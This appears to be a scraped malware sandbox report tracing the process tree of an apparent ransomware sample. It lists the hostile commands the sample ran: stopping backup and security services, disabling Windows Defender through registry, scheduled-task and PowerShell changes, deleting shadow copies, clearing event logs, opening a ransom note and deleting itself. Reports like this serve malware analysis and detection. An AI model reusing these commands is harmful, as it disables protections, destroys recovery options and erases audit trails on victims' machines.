a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1552 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1552 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1552 wrote to memory of 1952 1552 net.exe net1.exe PID 1552 wrote to memory of 1952 1552 net.exe net1.exe PID 1552 wrote to memory of 1952 1552 net.exe net1.exe PID 1552 wrote to memory of 1952 1552 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:660
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:472 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:272
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1492
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1800
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1324
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1984
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1220
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1952
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1716
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1796
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1004
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1516
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1748
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1328
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2004
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:996
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:904
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1488
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:516
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1868
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:296
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1984
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1364
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1592
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1688
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1824
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1388
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1744
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1060
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:924
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1524
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1508
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1692
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1108
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1548
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:972
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1336
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1776
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1728
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1736
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1484
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:932
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1976
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2000
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1752
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1356
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1496
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1324 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1696
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1960 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2084
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2120
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2140 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220 -
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\wPfq_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2572 -
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe"2⤵PID:2580
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2608
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5352a482d3076e201ca52f100f02bc42a
SHA127c6bdabdc3ea33a49a75d1377ba6aaf9261b93d
SHA256114bb2f120c0bc0bd5d9f24bc5334a21bd9ab27b6d4e3921cd33cf7c84fe3ce5
SHA512a55a64392b02bdfa77dc35aea3e57fd4ecc5e83aa84e041c7dcd974170284b4caf2c10ee0f76ef04ab90d1e89e5a886886095ddbc4331b5fe55145de9dc64ccd
-
MD5
3d3aab4fac96343c7e4bf9f111f89193
SHA1550d2ea76bb0a789e4bfbefef4a899c4fbad254c
SHA25654643189ee659f0e200ac4eb1ae678f35c016e0905eca63e675dbeadfc2422d8
SHA51215b065276f0f8acd76c54462a6f71153e0df65a10aff76412bf2582940b46ff64124e2577e320220aa9c0daf1e4d3f5fc5d4d78aee5979e60a10690a702badda